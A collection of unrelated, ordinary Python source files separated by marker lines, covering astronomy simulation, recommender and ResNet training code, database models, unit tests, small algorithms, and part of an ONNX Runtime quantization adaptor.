float(syst.get('ohTime',ohTime))*u.d # overhead time # imaging and characterization time multipliers syst['imagTimeMult'] = float(syst.get('imagTimeMult',imagTimeMult)) syst['charTimeMult'] = float(syst.get('charTimeMult',charTimeMult)) #populate system specifications to outspec for att in syst.keys(): if att not in ['throughput','contrast','PSF']: dat = syst[att] self._outspec['starlightSuppressionSystems'][nsyst][att] \ = dat.value if isinstance(dat,u.Quantity) else dat # populate fundamental IWA and OWA as required IWAs = [x.get('IWA') for x in self.starlightSuppressionSystems \ if x.get('IWA') is not None] if IWA is not None: self.IWA = float(IWA)*u.arcsec elif IWAs: self.IWA = min(IWAs) else: raise ValueError("Could not determine fundamental IWA.") OWAs = [x.get('OWA') for x in self.starlightSuppressionSystems \ if x.get('OWA') is not None] if OWA is not None: self.OWA = float(OWA)*u.arcsec if OWA != 0 else np.inf*u.arcsec elif OWAs: self.OWA = max(OWAs) else: raise ValueError("Could not determine fundamental OWA.") assert self.IWA < self.OWA, "Fundamental IWA must be smaller that the OWA." # populate outspec with all OpticalSystem scalar attributes for att in self.__dict__.keys(): if att not in ['F0','scienceInstruments','starlightSuppressionSystems',\ 'Imager','ImagerSyst','Spectro','SpectroSyst']: dat = self.__dict__[att] self._outspec[att] = dat.value if isinstance(dat,u.Quantity) else dat # default detectors and imagers self.Imager = self.scienceInstruments[0] self.ImagerSyst = self.starlightSuppressionSystems[0] self.Spectro = self.scienceInstruments[-1] self.SpectroSyst = self.starlightSuppressionSystems[-1] def __str__(self): """String representation of the Optical System object When the command 'print' is used on the Optical System object, this method will print the attribute values contained in the object""" for att in self.__dict__.keys(): print '%s: %r' % (att, getattr(self, att)) return 'Optical System class object attributes' def Cp_Cb(self, TL, sInds, dMag, WA, fEZ, fZ, inst, syst, Npix): """ Calculates electron count rates for planet signal and background noise. Args: TL (object): TargetList class object sInds (integer ndarray): Integer indices of the stars of interest, with the length of the number of planets of interest dMag (float ndarray): Differences in magnitude between planets and their host star WA (astropy Quantity array): Working angles of the planets of interest in units of arcsec fEZ (astropy Quantity array): Surface brightness of exo-zodiacal light in units of 1/arcsec2 fZ (astropy Quantity array): Surface brightness of local zodiacal light in units of 1/arcsec2 inst (dict): Selected Science Instrument syst (dict): Selected Starlight Suppression System Npix (float): Number of noise pixels Returns: C_p (astropy Quantity array): Planet signal electron count rate in units of 1/s C_b (astropy Quantity array): Background noise electron count rate in units of 1/s """ # check type of sInds sInds = np.array(sInds) if not sInds.shape: sInds = np.array([sInds]) lam = inst['lam'] # central wavelength deltaLam = inst['deltaLam'] # bandwidth QE = inst['QE'](lam) # quantum efficiency Q = syst['contrast'](lam, WA) # contrast T = syst['throughput'](lam, WA) / inst['Ns'] \ * self.attenuation # throughput mV = TL.starMag(sInds,lam) # star visual magnitude X = np.sqrt(2)/2 # aperture photometry radius (in lam/D) Theta = (X*lam/self.pupilDiam*u.rad).to('arcsec') # angular radius (in arcseconds) Omega = np.pi*Theta**2 # solid angle subtended by the aperture # electron count rates [ s^-1 ] C_F0 = self.F0(lam)*QE*T*self.pupilArea*deltaLam C_p = C_F0*10.**(-0.4*(mV + dMag)) # planet signal C_sr = C_F0*10.**(-0.4*mV)*Q # residual suppressed starlight (coro) C_zl = C_F0*(fZ+fEZ)*Omega # zodiacal light = local + exo C_dc = Npix*inst['idark'] # dark current C_cc = Npix*inst['CIC']/inst['texp'] # clock-induced-charge C_rn = Npix*(inst['sread']/inst['Gem'])**2/inst['texp'] # readout noise C_b = inst['ENF']**2*(C_sr+C_zl+C_dc+C_cc)+C_rn # total noise budget return C_p, C_b def calc_intTime(self, TL, sInds, dMag, WA, fEZ, fZ): """Finds integration time for a specific target system This method is called by a method in the SurveySimulation class object. This method defines the data type expected, integration time is determined by specific OpticalSystem classes. Args: TL (object): TargetList class object sInds (integer ndarray): Integer indices of the stars of interest, with the length of the number of planets of interest dMag (float ndarray): Differences in magnitude between planets and their host star WA (astropy Quantity array): Working angles of the planets of interest in units of arcsec fEZ (astropy Quantity array): Surface brightness of exo-zodiacal light in units of 1/arcsec2 fZ (astropy Quantity array): Surface brightness of local zodiacal light in units of 1/arcsec2 Returns: intTime (astropy Quantity array): Integration times in units of day """ # check type of sInds sInds = np.array(sInds) if not sInds.shape: sInds = np.array([sInds]) intTime = np.ones(len(sInds))*u.day return intTime def calc_charTime(self, TL, sInds, dMag, WA, fEZ, fZ): """Finds characterization time for a specific target system This method is called by a method in the SurveySimulation class object. This method defines the data type expected, characterization time is determined by specific OpticalSystem classes. Args: TL (object): TargetList class object sInds (integer ndarray): Integer indices of the stars of interest, with the length of the number of planets of interest dMag (float ndarray): Differences in magnitude between planets and their host star WA (astropy Quantity array): Working angles of the planets of interest in units of arcsec fEZ (astropy Quantity array): Surface brightness of exo-zodiacal light in units of 1/arcsec2 fZ (astropy Quantity array): Surface brightness of local zodiacal light in units of 1/arcsec2 Returns: charTime (astropy Quantity array): Characterization times in units of day """ # check type of sInds sInds = np.array(sInds) if not sInds.shape: sInds = np.array([sInds]) charTime = np.ones(len(sInds))*u.day return charTime def calc_maxintTime(self, TL): """Finds maximum integration time for target systems This method is called in the __init__ method of the TargetList class object. The working angle is set to the optical system IWA value, and the planet inclination is set to 0. Args: TL (object): TargetList class object Returns: maxintTime (astropy Quantity array): Maximum integration times for target list stars in units of day """ # generate sInds for the whole TargetList sInds = np.array(range(TL.nStars)) # set default max integration time to dMag = dMagLim, WA = IWA, fzodi = 0 dMag = np.array([self.dMagLim]*TL.nStars) WA = np.array([self.IWA.value]*TL.nStars)*u.arcsec fEZ = np.zeros(TL.nStars)/u.arcsec**2 fZ = np.zeros(TL.nStars)/u.arcsec**2 maxintTime = self.calc_intTime(TL, sInds, dMag, WA, fEZ, fZ) return maxintTime
nilq/baby-python
python
# Copyright (c) ACSONE SA/NV 2018 # Distributed under the MIT License (http://opensource.org/licenses/MIT). import logging from ..router import router from ..tasks.main_branch_bot import main_branch_bot from ..version_branch import is_main_branch_bot_branch _logger = logging.getLogger(__name__) @router.register("push") async def on_push_to_main_branch(event, gh, *args, **kwargs): """ On push to main branches, run the main branch bot task. """ org, repo = event.data["repository"]["full_name"].split("/") branch = event.data["ref"].split("/")[-1] if not is_main_branch_bot_branch(branch): return main_branch_bot.delay(org, repo, branch)
nilq/baby-python
python
import os import pathlib import pytest from mopidy_local import translator @pytest.mark.parametrize( "local_uri,file_uri", [ ("local:directory:A/B", "file:///home/alice/Music/A/B"), ("local:directory:A%20B", "file:///home/alice/Music/A%20B"), ("local:directory:A+B", "file:///home/alice/Music/A%2BB"), ( "local:directory:%C3%A6%C3%B8%C3%A5", "file:///home/alice/Music/%C3%A6%C3%B8%C3%A5", ), ("local:track:A/B.mp3", "file:///home/alice/Music/A/B.mp3"), ("local:track:A%20B.mp3", "file:///home/alice/Music/A%20B.mp3"), ("local:track:A+B.mp3", "file:///home/alice/Music/A%2BB.mp3"), ( "local:track:%C3%A6%C3%B8%C3%A5.mp3", "file:///home/alice/Music/%C3%A6%C3%B8%C3%A5.mp3", ), ], ) def test_local_uri_to_file_uri(local_uri, file_uri): media_dir = pathlib.Path("/home/alice/Music") assert translator.local_uri_to_file_uri(local_uri, media_dir) == file_uri @pytest.mark.parametrize("uri", ["A/B", "local:foo:A/B"]) def test_local_uri_to_file_uri_errors(uri): media_dir = pathlib.Path("/home/alice/Music") with pytest.raises(ValueError): translator.local_uri_to_file_uri(uri, media_dir) @pytest.mark.parametrize( "uri,path", [ ("local:directory:A/B", b"/home/alice/Music/A/B"), ("local:directory:A%20B", b"/home/alice/Music/A B"), ("local:directory:A+B", b"/home/alice/Music/A+B"), ( "local:directory:%C3%A6%C3%B8%C3%A5", b"/home/alice/Music/\xc3\xa6\xc3\xb8\xc3\xa5", ), ("local:track:A/B.mp3", b"/home/alice/Music/A/B.mp3"), ("local:track:A%20B.mp3", b"/home/alice/Music/A B.mp3"), ("local:track:A+B.mp3", b"/home/alice/Music/A+B.mp3"), ( "local:track:%C3%A6%C3%B8%C3%A5.mp3", b"/home/alice/Music/\xc3\xa6\xc3\xb8\xc3\xa5.mp3", ), ], ) def test_local_uri_to_path(uri, path): media_dir = pathlib.Path("/home/alice/Music") result = translator.local_uri_to_path(uri, media_dir) assert isinstance(result, pathlib.Path) assert bytes(result) == path @pytest.mark.parametrize("uri", ["A/B", "local:foo:A/B"]) def test_local_uri_to_path_errors(uri): media_dir = pathlib.Path("/home/alice/Music") with pytest.raises(ValueError): translator.local_uri_to_path(uri, media_dir) @pytest.mark.parametrize( "path,uri", [ ("/foo", "file:///foo"), (b"/foo", "file:///foo"), ("/æøå", "file:///%C3%A6%C3%B8%C3%A5"), (b"/\x00\x01\x02", "file:///%00%01%02"), (pathlib.Path("/æøå"), "file:///%C3%A6%C3%B8%C3%A5"), ], ) def test_path_to_file_uri(path, uri): assert translator.path_to_file_uri(path) == uri @pytest.mark.parametrize( "path,uri", [ (pathlib.Path("foo"), "local:track:foo"), (pathlib.Path("/home/alice/Music/foo"), "local:track:foo"), (pathlib.Path("æøå"), "local:track:%C3%A6%C3%B8%C3%A5"), (pathlib.Path(os.fsdecode(b"\x00\x01\x02")), "local:track:%00%01%02"), ], ) def test_path_to_local_track_uri(path, uri): media_dir = pathlib.Path("/home/alice/Music") result = translator.path_to_local_track_uri(path, media_dir) assert isinstance(result, str) assert result == uri
nilq/baby-python
python
import torch import numpy as np from torch import nn, optim, Tensor from ..envs.configuration import Configuration from .abstract import Agent # Default Arguments. bandit_mf_square_args = { 'num_products': 1000, 'embed_dim': 5, 'mini_batch_size': 32, 'loss_function': nn.BCEWithLogitsLoss(), 'optim_function': optim.RMSprop, 'learning_rate': 0.01, 'with_ps_all': False, } # Model. class BanditMFSquare(nn.Module, Agent): def __init__(self, config = Configuration(bandit_mf_square_args)): nn.Module.__init__(self) Agent.__init__(self, config) self.product_embedding = nn.Embedding( self.config.num_products, self.config.embed_dim ) self.user_embedding = nn.Embedding( self.config.num_products, self.config.embed_dim ) # Initializing optimizer type. self.optimizer = self.config.optim_function( self.parameters(), lr = self.config.learning_rate ) self.last_product_viewed = None self.curr_step = 0 self.train_data = ([], [], []) self.all_products = np.arange(self.config.num_products) def forward(self, products, users = None): if users is None: users = np.full(products.shape[0], self.last_product_viewed) a = self.product_embedding(torch.LongTensor(products)) b = self.user_embedding(torch.LongTensor(users)) return torch.sum(a * b, dim = 1) def get_logits(self): """Returns vector of product recommendation logits""" return self.forward(self.all_products) def update_lpv(self, observation): """Updates the last product viewed based on the observation""" assert (observation is not None) assert (observation.sessions() is not None) if observation.sessions(): self.last_product_viewed = observation.sessions()[-1]['v'] def act(self, observation, reward, done): with torch.no_grad(): # Update last product viewed. self.update_lpv(observation) # Get logits for all possible actions. logits = self.get_logits() # No exploration strategy, choose maximum logit. action = logits.argmax().item() if self.config.with_ps_all: all_ps = np.zeros(self.config.num_products) all_ps[action] = 1.0 else: all_ps = () return { **super().act(observation, reward, done), **{ 'a': action, 'ps': logits[action], 'ps-a': all_ps, }, } def update_weights(self): """Update weights of embedding matrices using mini batch of data""" if len(self.train_data[0]) != 0: # Eliminate previous gradient. self.optimizer.zero_grad() assert len(self.train_data[0]) == len(self.train_data[1]) assert len(self.train_data[0]) == len(self.train_data[2]) lpvs, actions, rewards = self.train_data # Calculating logit of action and last product viewed. logit = self.forward(np.array(actions), np.array(lpvs)) # Converting reward into Tensor. reward = Tensor(np.array(rewards)) # Calculating supervised loss. loss = self.config.loss_function(logit, reward) loss.backward() # Update weight parameters. self.optimizer.step() def train(self, observation, action, reward, done = False): # print('BanditMFSquare train()') # Update last product viewed. self.update_lpv(observation) # Increment step. self.curr_step += 1 # Update weights of model once mini batch of data accumulated. if self.curr_step % self.config.mini_batch_size == 0: self.update_weights() self.train_data = ([], [], []) else: if action is not None and reward is not None: self.train_data[0].append(self.last_product_viewed) self.train_data[1].append(action['a']) self.train_data[2].append(reward)
nilq/baby-python
python
expected_output = { 'traffic_steering_policy': { 3053: { "sgt_policy_flag": '0x41400001', "source_sgt": 3053, "destination_sgt": 4003, "steer_type": 80, "steer_index": 1, "contract_name": 'Contract2', "ip_version": 'IPV4', "refcnt": 1, "flag": '0x41400000', "stale": False, "traffic_steering_ace": { 1: { "protocol_number": 6, "source_port": 'any', "destination_port": '16000', "service_name": 'service_INFRA_VN', }, 2: { "protocol_number": 17, "source_port": 'any', "destination_port": '12000', "service_name": 'service_INFRA_VN', } }, "traffic_steering_destination_list": 'Not exist', "traffic_steering_multicast_list": 'Not exist', "traffic_steering_policy_lifetime_secs": 86400, "policy_last_update_time": '05:51:21 UTC Wed Sep 29 2021', "policy_expires_in": '0:23:58:12', "policy_refreshes_in": '0:23:58:12' } } }
nilq/baby-python
python
def find_smallest(array): smallest = array[0] smallest_index = 0 for i in range(1, len(array)): if(array[i] < smallest): smallest = array[i] smallest_index = i return smallest_index res = [] my_array = [32,2,25,3,11,78,-2,32] print("my_array:", my_array) for i in range(len(my_array)): smallest_index = find_smallest(my_array) res.append(my_array.pop(smallest_index)) print("res:", res)
nilq/baby-python
python
from enum import Enum class PayIDNetwork(Enum): # Supported networks RIPPLE_TESTNET = "xrpl-testnet" ETHEREUM_GOERLI = "eth-goerli" # ETHEREUM_MAINNET = "eth-mainnet" # RIPPLE_MAINNET = "xrpl-mainnet" @property def environment(self) -> str: return self.value.split("-")[1].upper() @property def headers(self) -> dict: return {"Accept": f"application/{self.value}+json"} @property def code(self) -> str: return self.value.split("-")[0].lower() @property def ticker(self) -> str: if self in (self.ETHEREUM_GOERLI,): return "ETH" elif self in (self.RIPPLE_TESTNET,): return "XRP" raise NotImplementedError @property def currency(self) -> str: if self in (self.ETHEREUM_GOERLI,): return "Ethereum" elif self in (self.RIPPLE_TESTNET,): return "Ripple" raise NotImplementedError @classmethod def from_string(cls, network: str) -> "PayIDNetwork": if network not in {each.value for each in cls}: raise ValueError(f"Invalid network: {network}") return cls(network)
nilq/baby-python
python
nome = input("Nome do cliente: ") dv = int(input("Dia do vencimento: ")) mv = input("Digite o mes de vencimento: ") fatura = input("Fatura: ") print("Olá,",nome) print("A sua fatura com vencimento em",dv,"de",mv,"no valor de R$",fatura,"está fechada.")
nilq/baby-python
python
# integer Knapsack problem implementation def knapsack(size, inputs): inputs = sorted(inputs) history = {0: ()} for cur_input in inputs: for prev_value, prev_history in history.items(): # items instead of iteritems, to take a deep copy new_value = prev_value + cur_input new_history = prev_history + (cur_input,) if new_value == size: return new_history history[new_value] = new_history return None # failed to find a sum. def knapsack_wrapper(size, inputs): result = knapsack(size, inputs) if result is None: print "%d is not possible from combining %s" % (size, ", ".join(map(str, inputs))) else: print "%d = %s" % (size, " + ".join(map(str, result))) knapsack_wrapper(10, [10]) knapsack_wrapper(10, [3, 5, 2]) knapsack_wrapper(2536, [132,524,241,523,251,231,634]) knapsack_wrapper(10, [1,2,3,4,5]) knapsack_wrapper(63, [10, 20, 30, 32, 21]) knapsack_wrapper(10, [3, 8]) knapsack_wrapper(10, [1]) knapsack_wrapper(2535, [132,524,241,523,251,231,634])
nilq/baby-python
python
from itertools import count import numpy as np import tensorflow as tf from sklearn.model_selection import train_test_split from nets.resnet_v2 import resnet_arg_scope, resnet_v2_50 from utils import preprocess, preprocess_val import argparse import os def parse_args(): parser = argparse.ArgumentParser("A script to train resnet_2_50") parser.add_argument("--batchsize", type=int, default=32, help="batch size") parser.add_argument("--lr", type=float, default=1e-3, help="learning rate") parser.add_argument("--numepochs", type=int, default=20, help="number of epochs to train") parser.add_argument("--testsize", type=float, default=0.2, help="ratio of validation data") parser.add_argument("--labelmap", type=str, default="label.csv", help="labelmap file") parser.add_argument("--numthreads", type=int, default=4, help="number of threads to read data") parser.add_argument("--logdir", type=str, default="logs", help="log directory") return parser.parse_args() def main(args): # 使用numpy取文件的label, 先以string的形式读入 labelmap = np.genfromtxt(args.labelmap, dtype="U", delimiter=",") # 索引filename和label并转换为对应的数据类型 filenames = labelmap[:, 0].astype(np.unicode) labels = labelmap[:, 1].astype(np.int64) # 分训练集和验证集 filenames_train, filenames_val, labels_train, labels_val = train_test_split( filenames, labels, test_size=args.testsize) # 建立dataset # shuffle为打乱的意思,打乱顺序,但是文件名和标签还是相对应的。只是读取的顺序变了 # train dataset dataset_train = tf.data.Dataset.from_tensor_slices( (filenames_train, labels_train)).shuffle(len(filenames_train)) # num_parallel_calls: preprocess的线程数量, 此处为8个线程,可以调整 # batch(32): batchsize为32,可以调整 # prefetch(1): 预先读取1个batch, 可以加快训练,显卡一直有数据可以训练,不用等待cpu读取数据 dataset_train = dataset_train.map( preprocess, num_parallel_calls=args.numthreads).batch(args.batchsize).prefetch(1) # val dataset dataset_val = tf.data.Dataset.from_tensor_slices( (filenames_val, labels_val)).shuffle(len(filenames_val)) dataset_val = dataset_val.map( preprocess_val, num_parallel_calls=args.numthreads).batch(args.batchsize).prefetch(1) # 建立 Iterator iterator = tf.data.Iterator.from_structure( dataset_train.output_types, dataset_train.output_shapes) training_init_op = iterator.make_initializer(dataset_train) validation_init_op = iterator.make_initializer(dataset_val) image_batch, label_batch = iterator.get_next() istrain = tf.placeholder(tf.bool, name="istrain") # arg_scope可以设置一些操作中的默认值 with tf.contrib.slim.arg_scope(resnet_arg_scope()): logits, endpoints = resnet_v2_50( image_batch, is_training=istrain) endpoints['model_output'] = endpoints['global_pool'] = tf.reduce_mean( endpoints['resnet_v2_50/block4'], [1, 2], name='pool5', keep_dims=False) logits = tf.layers.dense(endpoints['model_output'], 2) # 计算loss loss = tf.losses.sparse_softmax_cross_entropy( labels=label_batch, logits=logits) # 计算accuracy correct = tf.equal(tf.argmax(logits, 1), label_batch) accuracy = tf.reduce_mean(tf.cast(correct, tf.float32)) # 将loss和accuracy加入summary, 通过tensorboard显示 tf.summary.scalar("loss", loss) tf.summary.scalar("accuracy", accuracy) merged = tf.summary.merge_all() # global_step, 每次sess.run()会加1 global_step = tf.Variable(0, trainable=False, name="global_step") # 优化器,这里使用的是adam, 可以尝试使用其它的优化器,adam比较常用 # optimzer = tf.train.AdamOptimizer() optimzer = tf.train.MomentumOptimizer(learning_rate=1e-3, momentum=0.9, use_nesterov=True) # 使用batchnorm的话要这样。 update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): train_op = optimzer.minimize(loss, global_step=global_step) # 定义saver用来保存模型 var_list = [v for v in tf.trainable_variables() if v.name.startswith("resnet")] saver = tf.train.Saver(var_list,max_to_keep=None) # 开始训练 with tf.Session() as sess: # 初始化变量, 前面定义的包括网络内的变量在这里才真正开始初始化 tf.global_variables_initializer().run() saver.restore(sess, "./resnet_v2_50.ckpt") # summary writer, 用来在写入graph, 以及summary train_writer = tf.summary.FileWriter( logdir=os.path.join(args.logdir, "train"), graph=sess.graph) # 训练过程 # 训练20个epoch for epoch in range(args.numepochs): print("Epoch {}/{}".format(epoch, args.numepochs)) for mode in ["train", "val"]: # 初始化Iterator if mode == "train": sess.run(training_init_op) else: sess.run(validation_init_op) # 用于保存整个数据集上的accuracy acc_avg = 0 # 迭代,使用itertools的cout建立一个死循环 for step in count(): # 使用try catch 来捕获tf.errors.OutOfRangeError用来判断数据是否完全迭代完一遍,迭代完会运行except中的内容,然后退出本层循环 try: # 执行对应的操作 if mode == "train": myloss, acc, summary, _ = sess.run( [loss, accuracy, merged, train_op], feed_dict={istrain: True}) train_writer.add_summary(summary, step) else: myloss, acc = sess.run( [loss, accuracy], feed_dict={istrain: False}) # 将当前batch的accuracy加入acc_avg, 运行完当前epoch后acc_avg会除以step, 从而得到整个数据集上的平均accuracy acc_avg += acc # 每10步显示以及保存summary if step % 10 == 0: print("mode: {}, step: {}, loss: {}, accuracy: {}".format(mode, step, myloss, acc)) # 数据迭代完后执行这个 except tf.errors.OutOfRangeError: # 打印当前epoch, accuracy 以及保存网络参数 print("{} Epoch {} done!".format(mode, epoch)) print("accuracy: {}".format(acc_avg / step)) if mode == "train": saver.save(sess, os.path.join( args.logdir, "resnet_2_50.ckpt")) # 跳出本层循环 break if __name__ == "__main__": args = parse_args() main(args)
nilq/baby-python
python
import os from dynaconf import settings from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker from database.models.transaction import Transaction from database.models.trade import Trade from database.models.types import Types from database.models.status import Status class Database(object): def __init__(self): self.engine = create_engine(settings.DATABASE_URL.format(os.environ['POSTGRES_USER'], os.environ['POSTGRES_PASSWORD'], os.environ['POSTGRES_USER'])) self.session = sessionmaker() self.session.configure(bind=self.engine) def create_transaction(self): return self.upsert_transaction(Transaction()) def upsert_transaction(self, transaction): return self._upsert_data(transaction) def count_transactions(self): session = self.session() try: count = session.query(Transaction).count() except: raise finally: session.close() return count def fetch_pending_sells(self): session = self.session() try: trades = session.query(Trade).filter(Trade.type == Types.SELL, Trade.status == Status.ONGOING).all() except: raise finally: session.close() return trades def upsert_trade(self, trade): return self._upsert_data(trade) def upsert_balance(self, balance): return self._upsert_data(balance) def _upsert_data(self, data): session = self.session() try: session.add(data) session.commit() session.refresh(data) except: session.rollback() raise finally: session.close() return data
nilq/baby-python
python
## # Copyright (c) 2012 Sprymix Inc. # All rights reserved. # # See LICENSE for details. ## import sys from setuptools import setup, Extension if sys.version_info[:2] < (3, 3): raise RuntimeError('metamagic.json requires python 3.3 or greater') readme = open('README.rst').read() setup( name='metamagic.json', version='0.9.6', description='Fast JSON encoder', long_description=readme, maintainer='MagicStack Inc.', maintainer_email='hello@magic.io', license='BSD', url='http://github.com/sprymix/metamagic.json', platforms=['any'], keywords='json', ext_modules=[ Extension('metamagic.json._encoder', sources=['metamagic/json/_encoder/_encoder.c'], extra_compile_args=['-O3']) ], classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: C', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4' ], packages=[ 'metamagic.json', 'metamagic.json._encoder', 'metamagic.json.tests' ], include_package_data=True )
nilq/baby-python
python
from flask_sqlalchemy import SQLAlchemy from api.db.data_request import DataRequest db = SQLAlchemy() class ParachainData(db.Model): __tablename__ = 'parachain_data' id = db.Column(db.Integer, primary_key=True, autoincrement=True) para_id = db.Column(db.String) account_id = db.Column(db.String) requested_block_number = db.Column(db.BigInteger) processed_block_number = db.Column(db.BigInteger) requested_timestamp = db.Column(db.DateTime) processed_timestamp = db.Column(db.DateTime) payload = db.Column(db.String) feed_name = db.Column(db.String) url = db.Column(db.String) @classmethod def select_all_by_feed(self, feed): result = db.session.query(ParachainData) \ .filter_by(feed_name=feed) \ .order_by(ParachainData.processed_timestamp) \ .all() return [ParachainData.row_to_dict(row) for row in result] @classmethod def row_to_dict(self, row): payload = {} for column in row.__table__.columns: payload[column.name] = str(getattr(row, column.name)) return payload @classmethod def insert_new_row(self, data_request:DataRequest): insert = ParachainData( para_id = data_request.para_id, account_id = data_request.account_id, requested_block_number = data_request.requested_block_number, processed_block_number = data_request.processed_block_number, requested_timestamp = data_request.requested_timestamp, processed_timestamp = data_request.processed_timestamp, payload = data_request.payload, feed_name = data_request.feed_name, url = data_request.url, ) db.session.add(insert) db.session.commit() class Users(db.Model): __tablename__ = 'users' id = db.Column(db.Integer, primary_key=True) wallet = db.Column(db.String(100), unique=True) api_key = db.Column(db.String(100))
nilq/baby-python
python
from IMLearn.learners import UnivariateGaussian, MultivariateGaussian import numpy as np # import plotly.graph_objects as go # import plotly.io as pio from matplotlib import pyplot as plt # pio.templates.default = "simple_white" def test_univariate_gaussian(): # Question 1 - Draw samples and print fitted model mu = 10 sigma = 1 univariategaussian = UnivariateGaussian().fit(np.random.normal(loc=mu, scale=sigma, size=1000)) print("({},{})".format(univariategaussian.mu_, univariategaussian.var_)) # Question 2 - Empirically showing sample mean is consistent mu = 10 sigma = 1 x = np.arange(10, 1000, 10) mu_array = [] sigma_array = [] for i in x: univariategaussian = UnivariateGaussian().fit(np.random.normal(loc=mu, scale=sigma, size=i)) mu_array.append(np.abs(univariategaussian.mu_ - mu)) plt.plot(x, mu_array) plt.legend(["mu"]) plt.xlabel("Sample Size") plt.ylabel("Absolute distance from real value") plt.title("The different errors according to different sample size.") plt.show() # Question 3 - Plotting Empirical PDF of fitted model univariategaussian = UnivariateGaussian().fit(np.random.normal(loc=mu, scale=sigma, size=1000)) t = np.linspace(6, 14, 1000) y = univariategaussian.pdf(t) plt.scatter(t, y) plt.legend(["PDF"]) plt.xlabel("Sample value") plt.ylabel("Density of probability") plt.title("PDF function for mu=10, sigma=1") # TODO: answer the Q3 plt.show() def test_multivariate_gaussian(): # Question 4 - Draw samples and print fitted model mu = np.array([0, 0, 4, 0]).T cov = np.array([[1, 0.2, 0, 0.5], [0.2, 2, 0, 0], [0, 0, 1, 0], [0.5, 0, 0, 1]]) samples = np.random.multivariate_normal(mu, cov, 1000) mvg = MultivariateGaussian().fit(samples) print() print("expectations:") print(mvg.mu_) print("cov matrix:") print(mvg.cov_) # Question 5 - Likelihood evaluation f3 = f1 = np.linspace(-10, 10, 200) y = np.zeros(shape=(200, 200)) b = True max = 0 maxi = (0, 0) samples = np.random.multivariate_normal(mu, cov, 1000) for i in range(200): for j in range(200): mu = np.array([f1[i], 0, f3[j], 0]).T y[i][j] = MultivariateGaussian.log_likelihood(mu, cov, samples) if b: max = y[i][j] b = False if max < y[i][j]: max = y[i][j] maxi = (i, j) plt.imshow(y, extent=[-10, 10, -10, 10]) plt.title("log-likelihood as a function of f1 and f3") plt.colorbar() plt.xlabel("feature 3") plt.ylabel("feature 1") plt.show() # Question 6 - Maximum likelihood print(maxi) if __name__ == '__main__': np.random.seed(0) test_univariate_gaussian() test_multivariate_gaussian()
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (c) 2021 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import copy import logging from collections import OrderedDict from collections.abc import KeysView import yaml import numpy as np from distutils.version import StrictVersion from neural_compressor.adaptor.adaptor import adaptor_registry, Adaptor from neural_compressor.adaptor.query import QueryBackendCapability from neural_compressor.utils.utility import LazyImport, dump_elapsed_time, \ GLOBAL_STATE, MODE from ..utils.utility import OpPrecisionStatistics from ..experimental.data.dataloaders.base_dataloader import BaseDataLoader import math onnx = LazyImport("onnx") ort = LazyImport("onnxruntime") ONNXRT152_VERSION = StrictVersion("1.5.2") logger = logging.getLogger() class ONNXRTAdaptor(Adaptor): """The ONNXRT adaptor layer, do onnx-rt quantization, calibration, inspect layer tensors. Args: framework_specific_info (dict): framework specific configuration for quantization. """ def __init__(self, framework_specific_info): super().__init__(framework_specific_info) self.__config_dict = {} self.quantizable_ops = [] self.static = framework_specific_info["approach"] == "post_training_static_quant" self.backend = framework_specific_info["backend"] self.work_space = framework_specific_info["workspace_path"] self.graph_optimization = framework_specific_info["graph_optimization"] self.benchmark = (GLOBAL_STATE.STATE == MODE.BENCHMARK) os.makedirs(self.work_space, exist_ok=True) self.pre_optimized_model = None self.quantizable_op_types = self._query_quantizable_op_types() self.evaluate_nums = 0 self.fp32_results = [] self.fp32_preds_as_label = False self.quantize_config = {} # adaptor should know current configs at any time self.quantize_params = {} # adaptor should know current params at any time @dump_elapsed_time("Pass quantize model") def quantize(self, tune_cfg, model, data_loader, q_func=None): """The function is used to do calibration and quanitization in post-training quantization. Args: tune_cfg (dict): quantization config. model (object): model need to do quantization. data_loader (object): calibration dataset. q_func (optional): training function for quantization aware training mode, unimplement yet for onnx. Returns: (dict): quantized model """ assert q_func is None, "quantization aware training has not been supported on ONNXRUNTIME" model = self.pre_optimized_model if self.pre_optimized_model else model ort_version = StrictVersion(ort.__version__) if ort_version < ONNXRT152_VERSION: # pragma: no cover logger.warning("Quantize input needs onnxruntime 1.5.2 or newer.") return model if model.model.opset_import[0].version < 11: # pragma: no cover logger.warning("Quantize input needs model opset 11 or newer.") from neural_compressor.adaptor.ox_utils.onnx_quantizer import ONNXQuantizer from onnxruntime.quantization.quant_utils import QuantizationMode backend = QuantizationMode.QLinearOps if self.backend == \ "qlinearops" else QuantizationMode.IntegerOps self.quantizable_ops = self._query_quantizable_ops(model.model) tmp_model = copy.deepcopy(model) quantize_config = self._cfg_to_quantize_config(tune_cfg) iterations = tune_cfg.get('calib_iteration', 1) calib_sampling_size = tune_cfg.get('calib_sampling_size', 1) if self.static: if isinstance(data_loader, BaseDataLoader): batch_size = data_loader.batch_size try: for i in range(batch_size): if calib_sampling_size % (batch_size - i) == 0: calib_batch_size = batch_size - i if i != 0: # pragma: no cover logger.warning("Reset `calibration.dataloader.batch_size` field " "to {}".format(calib_batch_size) + " to make sure the sampling_size is " "divisible exactly by batch size") break tmp_iterations = int(math.ceil(calib_sampling_size / calib_batch_size)) data_loader.batch(calib_batch_size) quantize_params = self._get_quantize_params(tmp_model.model, data_loader, \ quantize_config, tmp_iterations) except Exception: # pragma: no cover logger.warning( "Fail to forward with batch size={}, set to {} now.". format(batch_size, 1)) data_loader.batch(1) quantize_params = self._get_quantize_params(tmp_model.model, data_loader, \ quantize_config, calib_sampling_size) else: # pragma: no cover if hasattr(data_loader, 'batch_size') and \ calib_sampling_size % data_loader.batch_size != 0: logger.warning( "Please note that calibration sampling size {} " \ "isn't divisible exactly by batch size {}. " \ "So the real sampling size is {}.". format(calib_sampling_size, data_loader.batch_size, data_loader.batch_size * iterations)) quantize_params = self._get_quantize_params(tmp_model.model, data_loader, \ quantize_config, iterations) 